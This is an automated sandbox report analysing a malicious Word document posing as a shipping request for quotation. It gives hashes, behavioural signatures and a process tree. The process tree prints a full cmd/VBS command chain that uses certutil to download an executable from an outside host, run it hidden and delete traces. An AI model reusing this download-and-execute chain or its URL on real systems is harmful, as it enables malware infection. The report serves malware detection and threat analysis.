Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2022 07:55

General

  • Target

    RFQ-MVP300-3400 For MSA New Vessel.doc

  • Size

    63KB

  • MD5

    5d3e6d263bd94b901830e792fd237693

  • SHA1

    de135c0e1255f334513aff51515de780d8ac8099

  • SHA256

    7ce5a9235acf3eb2001197190b598be8fa49e8f0e2ef9d0ae0a1c2c3095cd7b7

  • SHA512

    3b1a29ef85680507f70f374fa5ec72cc56387b258d4a39ee64dc3ac980170116a0ddff972813a40a247a28f761aa129fea20d69753c543fade5f30c4991a6355

  • SSDEEP

    384:OiCquMo5W4eDbg8iSUR/8daGJrqrjKOxtXYI+Q/cj0tpbnopkpSEP0j:OiCXf5zSe/qvsuxI+4DpbnokSi

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ-MVP300-3400 For MSA New Vessel.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3968
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "http://tulpexim.com/html/dixtin.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo CreateObject("WScript.Shell").Run "cmd.exe /c %temp%\bin.exe", 0, True >> %temp%\script.vbs && timeout 3 && start %temp%\script.vbs && timeout 3 && del %temp%\script.vbs
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:4880
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:772
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f http://tulpexim.com/html/dixtin.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3572
          • C:\Windows\system32\certutil.exe
            certutil.exe -urlcache -split -f http://tulpexim.com/html/dixtin.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
            5⤵
              PID:4120
        • C:\Windows\system32\timeout.exe
          timeout 3
          3⤵
          • Delays execution with timeout.exe
          PID:4116

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\script.vbs
      Filesize

      289B

      MD5

      662449f1879133e0fc1f2385f79debfc

      SHA1

      47895b9fb941a4cf85224ead44e3dedb6b4ab6a0

      SHA256

      749c75087d71b5be5b97333ac2a47bf758e4c2a6fc393c40bde00a73cea4fd98

      SHA512

      d200dfb1e4900524d6663f5fc81f08decc5d8c57c57a6dd852e5ea4a59632c9ebec7ff59f275c4acd79130baaab799a5833394867f8acf9d75cf4ffa536e3c83

    • memory/772-141-0x0000000000000000-mapping.dmp
    • memory/3572-144-0x0000000000000000-mapping.dmp
    • memory/3756-139-0x0000000000000000-mapping.dmp
    • memory/3968-135-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp
      Filesize

      64KB

    • memory/3968-137-0x00007FF832E40000-0x00007FF832E50000-memory.dmp
      Filesize

      64KB

    • memory/3968-138-0x00007FF832E40000-0x00007FF832E50000-memory.dmp
      Filesize

      64KB

    • memory/3968-136-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp
      Filesize

      64KB

    • memory/3968-132-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp
      Filesize

      64KB

    • memory/3968-134-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp
      Filesize

      64KB

    • memory/3968-133-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp
      Filesize

      64KB

    • memory/4116-142-0x0000000000000000-mapping.dmp
    • memory/4120-145-0x0000000000000000-mapping.dmp
    • memory/4880-140-0x0000000000000000-mapping.dmp